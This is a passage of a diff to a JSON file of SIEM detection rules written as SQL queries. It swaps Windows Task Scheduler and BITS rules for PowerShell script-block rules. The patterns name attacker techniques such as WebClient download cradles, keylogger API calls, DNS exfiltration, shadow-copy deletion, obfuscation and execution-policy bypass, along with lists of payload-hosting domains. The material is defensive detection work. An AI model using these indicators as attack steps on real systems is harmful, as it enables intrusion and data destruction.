"403c2cc0-7f6b-4925-9423-bfa573bed7eb", "status": "experimental", - "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", - "author": "frack113", + "description": "Detects suspicious PowerShell download command", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1489" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "PowerShell scripts that download content from the Internet" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName 
LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Net.WebClient%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.DownloadFile(%' ESCAPE '\\' OR ScriptBlockText LIKE '%.DownloadString(%' ESCAPE '\\'))" ], - "filename": "win_taskscheduler_susp_schtasks_delete.yml" + "filename": "posh_ps_susp_download.yml" }, { - "title": "Scheduled Task Executed From A Suspicious Location", - "id": "424273ea-7cf8-43a6-b712-375f925e481f", + "title": "Powershell Keylogging", + "id": "34f90d3c-c297-49e9-b26d-911b05a4866c", "status": "experimental", - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may log user keystrokes to intercept credentials as the user types them.", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.collection", + "attack.t1056.001" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Path LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Path LIKE 
'%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Path LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR (ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetAsyncKeyState%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ProcAddress user32.dll GetForegroundWindow%' ESCAPE '\\')))" ], - "filename": "win_taskscheduler_execution_from_susp_locations.yml" + "filename": "posh_ps_keylogging.yml" }, { - "title": "Scheduled Task Executed Uncommon LOLBIN", - "id": "f0767f15-0fb3-44b9-851e-e8d9a6d0005d", + "title": "Add New Windows Capability - ScriptBlock", + "id": "155c7fd5-47b4-49b2-bbeb-eb4fab335429", "status": "experimental", - "description": "Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task", + "description": "Detects usage of the \"Add-WindowsCapability\" cmdlet to add new windows capabilities. Notable capabilities could be \"OpenSSH\" and others.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1053.005" + "attack.execution" ], "falsepositives": [ - "False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule" + "Legitimate usage of the capabilities by administartors or users. 
Filter accordingly" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '129' AND (Path LIKE '%\\\\calc.exe' ESCAPE '\\' OR Path LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Path LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Path LIKE '%\\\\mspaint.exe' ESCAPE '\\' OR Path LIKE '%\\\\notepad.exe' ESCAPE '\\' OR Path LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Path LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-WindowsCapability %' ESCAPE '\\' AND ScriptBlockText LIKE '%OpenSSH.%' ESCAPE '\\')" ], - "filename": "win_taskscheduler_lolbin_execution_via_task_scheduler.yml" + "filename": "posh_ps_add_windows_capability.yml" }, { - "title": "Suspicious Download with BITS from Direct IP", - "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a direct IP. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Powershell DNSExfiltration", + "id": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "status": "test", + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unknown" + "Legitimate script" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' OR RemoteName LIKE '%://172.23.%' ESCAPE '\\' OR RemoteName 
LIKE '%://172.24.%' ESCAPE '\\' OR RemoteName LIKE '%://172.25.%' ESCAPE '\\' OR RemoteName LIKE '%://172.26.%' ESCAPE '\\' OR RemoteName LIKE '%://172.27.%' ESCAPE '\\' OR RemoteName LIKE '%://172.28.%' ESCAPE '\\' OR RemoteName LIKE '%://172.29.%' ESCAPE '\\' OR RemoteName LIKE '%://172.30.%' ESCAPE '\\' OR RemoteName LIKE '%://172.31.%' ESCAPE '\\' OR RemoteName LIKE '%://127.%' ESCAPE '\\' OR RemoteName LIKE '%://169.254.%' ESCAPE '\\')) OR ((RemoteName LIKE '%https://7-%' ESCAPE '\\' OR RemoteName LIKE '%http://7-%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-DNSExfiltrator%' ESCAPE '\\' OR (ScriptBlockText LIKE '% -i %' ESCAPE '\\' AND ScriptBlockText LIKE '% -d %' ESCAPE '\\' AND ScriptBlockText LIKE '% -p %' ESCAPE '\\' AND ScriptBlockText LIKE '% -doh %' ESCAPE '\\' AND ScriptBlockText LIKE '% -t %' ESCAPE '\\')))" ], - "filename": "win_bits_client_direct_ip_access.yml" + "filename": "posh_ps_invoke_dnsexfiltration.yml" }, { - "title": "Suspicious Uncommon Download with BITS from Suspicious TLD", - "id": "6d44fb93-e7d2-475c-9d3d-54c9c1e33427", - "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "title": "PowerShell Deleted Mounted Share", + "id": "66a4d409-451b-4151-94f4-a55d559c49b0", + "status": "test", + "description": "Detects when when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1070.005" ], "falsepositives": [ - "Other legitimate domains used by software updaters" + "Administrators or Power users may remove their shares via cmd line" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND NOT ((RemoteName LIKE '%.com%' ESCAPE '\\' OR RemoteName LIKE '%.azureedge.net%' ESCAPE '\\' OR RemoteName LIKE '%.sfx.ms%' ESCAPE '\\' OR RemoteName LIKE '%download.mozilla.org%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Remove-SmbShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-FileShare%' ESCAPE '\\'))" ], - "filename": "win_bits_client_uncommon_domain.yml" + "filename": "posh_ps_susp_mounted_share_deletion.yml" }, { - "title": "Suspicious Download File Extension with BITS", - "id": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", - "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "frack113", + "title": "Suspicious PowerShell WindowStyle Option", + "id": "313fbb0a-a341-4682-848d-6d6f8c4fab7c", + "status": "test", + "description": "Adversaries may use hidden windows to conceal malicious activity from the plain sight of users.\nIn some cases, windows that would typically be displayed when an application carries out an operation can be hidden\n", + "author": "frack113, Tim 
Shelton (fp AWS)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1564.003" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (LocalName LIKE '%.bat' ESCAPE '\\' OR LocalName LIKE '%.dll' ESCAPE '\\' OR LocalName LIKE '%.exe' ESCAPE '\\' OR LocalName LIKE '%.ps1' ESCAPE '\\' OR LocalName LIKE '%.vbe' ESCAPE '\\' OR LocalName LIKE '%.vbs' ESCAPE '\\')) AND NOT (LocalName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND RemoteName LIKE '%.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%WindowStyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%Hidden%' ESCAPE '\\') AND NOT (ScriptBlockText LIKE '%:\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND ScriptBlockText LIKE '%$PSScriptRoot\\\\Module\\\\WorkspaceScriptModule\\\\WorkspaceScriptModule%' ESCAPE '\\'))" ], - "filename": "win_bits_client_susp_local_file.yml" + "filename": "posh_ps_susp_windowstyle.yml" }, { - "title": "Suspicious Download with BITS from Suspicious TLD", - "id": "d635249d-86b5-4dad-a8c7-d7272b788586", + "title": "Execution via CL_Invocation.ps1 - Powershell", + "id": "4cd29327-685a-460e-9dac-c3ab96e549dc", "status": "experimental", - "description": "Detects a suspicious download using the BITS client from a FQDN that is unusual. 
Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "author": "oscd.community, Natalia Shornikova", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.t1216" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (RemoteName LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR RemoteName LIKE '%mediafire.com%' ESCAPE '\\' OR RemoteName LIKE '%mega.nz%' ESCAPE '\\' OR RemoteName LIKE '%ddns.net%' ESCAPE '\\' OR RemoteName LIKE '%.paste.ee%' ESCAPE '\\' OR RemoteName LIKE '%.hastebin.com%' ESCAPE '\\' OR RemoteName LIKE '%.ghostbin.co/%' ESCAPE '\\' OR RemoteName LIKE '%ufile.io%' ESCAPE '\\' OR RemoteName LIKE '%storage.googleapis.com%' ESCAPE '\\' OR RemoteName LIKE '%anonfiles.com%' ESCAPE '\\' OR RemoteName LIKE '%send.exploit.in%' ESCAPE '\\' OR RemoteName LIKE '%transfer.sh%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.net%' ESCAPE '\\' OR RemoteName LIKE '%privatlab.com%' ESCAPE '\\' OR RemoteName LIKE '%sendspace.com%' ESCAPE '\\' OR RemoteName LIKE '%pastetext.net%' ESCAPE '\\' OR RemoteName LIKE '%pastebin.pl%' ESCAPE '\\' OR RemoteName LIKE '%paste.ee%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Invocation.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%SyncInvoke%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_domain.yml" + "filename": "posh_ps_cl_invocation_lolscript.yml" }, { - "title": "Download with BITS to Suspicious 
Folder", - "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "title": "PowerShell Hotfix Enumeration", + "id": "f5d1def8-1de0-4a0e-9794-1f6f27dd605c", "status": "experimental", - "description": "Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads.\nWindows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001)\n", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects call to \"Win32_QuickFixEngineering\" in order to enumerate installed hotfixes often used in \"enum\" scripts by attackers", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197" + "attack.discovery" ], "falsepositives": [ - "Administrator PowerShell scripts" + "Legitimate administration scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%\\%public\\%%' ESCAPE '\\' OR LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Win32\\_QuickFixEngineering%' ESCAPE '\\' AND ScriptBlockText LIKE '%HotFixID%' ESCAPE '\\')" ], - "filename": "win_bits_client_susp_local_folder.yml" + "filename": "posh_ps_hotfix_enum.yml" }, { - "title": "Unsigned Binary Loaded From Suspicious Location", - "id": "8289bf8c-4aca-4f5a-9db3-dc3d7afe5c10", + "title": "Invoke-Obfuscation Via Use Clip - Powershell", + "id": "db92dd33-a3ad-49cf-8c2c-608c3e30ace0", "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking processes from 
loading unsigned DLLs residing in suspicious locations", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ImageName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR ImageName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR ImageName LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*?echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?).*')" ], - "filename": "win_security_mitigations_unsigned_dll_from_susp_location.yml" + "filename": "posh_ps_invoke_obfuscation_via_use_clip.yml" }, { - "title": "Microsoft Defender Blocked from Loading Unsigned DLL", - "id": "0b0ea3cc-99c8-4730-9c53-45deee2a4c86", - "status": "experimental", - "description": "Detects Code Integrity (CI) engine blocking Microsoft Defender's processes (MpCmdRun and NisSrv) from loading unsigned DLLs which may be an attempt to sideload arbitrary DLL", - "author": "Bhabesh Raj", + "title": "Powershell Detect Virtualization Environment", + "id": "d93129cd-1ee0-479f-bc03-ca6f129882e3", + "status": "test", + "description": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments.\nThis may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox\n", + "author": "frack113, Duc.Le-GTSC", 
"tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1497.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID IN ('11', '12') AND (ProcessPath LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR ProcessPath LIKE '%\\\\NisSrv.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%gwmi%' ESCAPE '\\') AND (ScriptBlockText LIKE '%MSAcpi\\_ThermalZoneTemperature%' ESCAPE '\\' OR ScriptBlockText LIKE '%Win32\\_ComputerSystem%' ESCAPE '\\'))" ], - "filename": "win_security_mitigations_defender_load_unsigned_dll.yml" + "filename": "posh_ps_detect_vm_env.yml" }, { - "title": "Suspicious Digital Signature Of AppX Package", - "id": "b5aa7d60-c17e-4538-97de-09029d6cd76b", + "title": "Root Certificate Installed - PowerShell", + "id": "42821614-9264-4761-acfc-5772c3286f76", "status": "experimental", - "description": "Detects execution of AppX packages with known suspicious or malicious signature", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", "tags": [ "attack.defense_evasion", - "attack.execution" + "attack.t1553.004" ], "falsepositives": [ - "Unknown" + "Help Desk or IT may need to manually add a corporate Root CA on occasion. 
Need to test if GPO push doesn't trigger FP" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-AppxPackaging/Operational' AND EventID = '157' AND subjectName = 'CN=Foresee Consulting Inc., O=Foresee Consulting Inc., L=North York, S=Ontario, C=CA, SERIALNUMBER=1004913-1, OID.1.3.6.1.4.1.311.60.2.1.3=CA, OID.2.5.4.15=Private Organization')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Move-Item%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\') OR (ScriptBlockText LIKE '%Import-Certificate%' ESCAPE '\\' AND ScriptBlockText LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\')))" ], - "filename": "win_appxpackaging_om_sups_appx_signature.yml" + "filename": "posh_ps_root_certificate_installed.yml" }, { - "title": "HybridConnectionManager Service Running", - "id": "b55d23e5-6821-44ff-8a6e-67218891e49f", - "status": "test", - "description": "Rule to detect the Hybrid Connection Manager service running on an endpoint.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Change PowerShell Policies to an Insecure Level - PowerShell", + "id": "61d0475c-173f-4844-86f7-f3eebae1c66b", + "status": "experimental", + "description": "Detects use of Set-ExecutionPolicy to set insecure policies", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1554" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate use of Hybrid Connection Manager via Azure function apps." 
+ "Administrator script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-ServiceBus-Client' AND EventID IN ('40300', '40301', '40302') AND (logs MATCH ('\"HybridConnection\" OR \"sb://\" OR \"servicebus.windows.net\" OR \"HybridConnectionManage\"')))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Set-ExecutionPolicy%' ESCAPE '\\' AND (ScriptBlockText LIKE '%Unrestricted%' ESCAPE '\\' OR ScriptBlockText LIKE '%bypass%' ESCAPE '\\' OR ScriptBlockText LIKE '%RemoteSigned%' ESCAPE '\\')) AND NOT ((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\AppData\\\\Roaming\\\\Code\\\\%' ESCAPE '\\')))" ], - "filename": "win_hybridconnectionmgr_svc_running.yml" + "filename": "posh_ps_set_policies_to_unsecure_level.yml" }, { - "title": "Suspicious Application Installed", - "id": "83c161b6-ca67-4f33-8ad0-644a0737cf07", - "status": "experimental", - "description": "Detects suspicious application installed by looking at the added shortcut to the app resolver cache", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Execute Invoke-command on Remote Host", + "id": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", + "status": "test", + "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). 
The adversary may then perform actions as the logged-on user.", + "author": "frack113", "tags": [ - "attack.execution" + "attack.lateral_movement", + "attack.t1021.006" ], "falsepositives": [ - "Packages or applications being legitimately used by users or administrators" + "Legitimate script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '28115' AND (Name LIKE '%Zenmap%' ESCAPE '\\' OR Name LIKE '%AnyDesk%' ESCAPE '\\' OR Name LIKE '%wireshark%' ESCAPE '\\' OR Name LIKE '%openvpn%' ESCAPE '\\')) OR (EventID = '28115' AND (AppID LIKE '%zenmap.exe%' ESCAPE '\\' OR AppID LIKE '%prokzult ad%' ESCAPE '\\' OR AppID LIKE '%wireshark%' ESCAPE '\\' OR AppID LIKE '%openvpn%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%invoke-command %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ComputerName %' ESCAPE '\\')" ], - "filename": "win_shell_core_susp_packages_installed.yml" + "filename": "posh_ps_invoke_command_remote.yml" }, { - "title": "Suspicious Rejected SMB Guest Logon From IP", - "id": "71886b70-d7b4-4dbf-acce-87d2ca135262", + "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", + "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", "status": "test", - "description": "Detect Attempt PrintNightmare (CVE-2021-1675) Remote code execution in Windows Spooler Service", - "author": "Florian Roth (Nextron Systems), KevTheHermit, fuzzyf10w", + "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. 
This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1110.001" + "attack.impact", + "attack.t1490" ], "falsepositives": [ - "Account fallback reasons (after failed login with specific account)" + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + ], + "filename": "posh_ps_susp_win32_shadowcopy.yml" + }, + { + "title": "Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell", + "id": "20e5497e-331c-4cd5-8d36-935f6e2a9a07", + "status": "experimental", + "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", + "author": "Timur Zinniatullin, oscd.community", + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ], + "falsepositives": [ + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-SmbClient/Security' AND EventID = '31017' AND UserName = '' AND ServerName LIKE '\\\\1%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%text.encoding]::ascii%' ESCAPE '\\' AND (ScriptBlockText LIKE '%system.io.compression.deflatestream%' ESCAPE '\\' OR ScriptBlockText LIKE '%system.io.streamreader%' ESCAPE '\\') AND ScriptBlockText LIKE '%readtoend' ESCAPE '\\')" ], - "filename": "win_susp_failed_guest_logon.yml" + "filename": "posh_ps_invoke_obfuscation_via_compress.yml" }, { - "title": "Standard User In High Privileged Group", - "id": "7ac407cc-0f48-4328-aede-de1d2e6fef41", + "title": "Powershell 
Install a DLL in System Directory", + "id": "63bf8794-9917-45bc-88dd-e1b5abc0ecfd", "status": "experimental", - "description": "Detect standard users login that are part of high privileged groups such as the Administrator group", - "author": "frack113", + "description": "Uses PowerShell to install/copy a a file into a system directory such as \"System32\" or \"SysWOW64\"", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.credential_access", - "attack.privilege_escalation" + "attack.t1556.002" ], "falsepositives": [ - "Standard domain users who are part of the administrator group. These users shouldn't have these right. But in the case where it's necessary. They should be filtered out using the \"TargetUserName\" field" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-LSA/Operational' AND (EventID = '300' AND TargetUserSid LIKE 'S-1-5-21-%' ESCAPE '\\' AND (SidList LIKE '%S-1-5-32-544%' ESCAPE '\\' OR SidList LIKE '%-500}%' ESCAPE '\\' OR SidList LIKE '%-518}%' ESCAPE '\\' OR SidList LIKE '%-519}%' ESCAPE '\\')) AND NOT ((TargetUserSid LIKE '%-500' ESCAPE '\\' OR TargetUserSid LIKE '%-518' ESCAPE '\\' OR TargetUserSid LIKE '%-519' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Copy-Item %' ESCAPE '\\' AND ScriptBlockText LIKE '%-Destination %' ESCAPE '\\' AND (ScriptBlockText LIKE '%\\\\Windows\\\\System32%' ESCAPE '\\' OR ScriptBlockText LIKE '%\\\\Windows\\\\SysWOW64%' ESCAPE '\\'))" ], - "filename": "win_lsa_server_normal_user_admin.yml" + "filename": "posh_ps_copy_item_system_directory.yml" }, { - "title": "Loading Diagcab Package From Remote Path", - "id": "50cb47b8-2c33-4b23-a2e9-4600657d9746", + "title": "Disable of ETW Trace - Powershell", + "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", "status": "experimental", - "description": 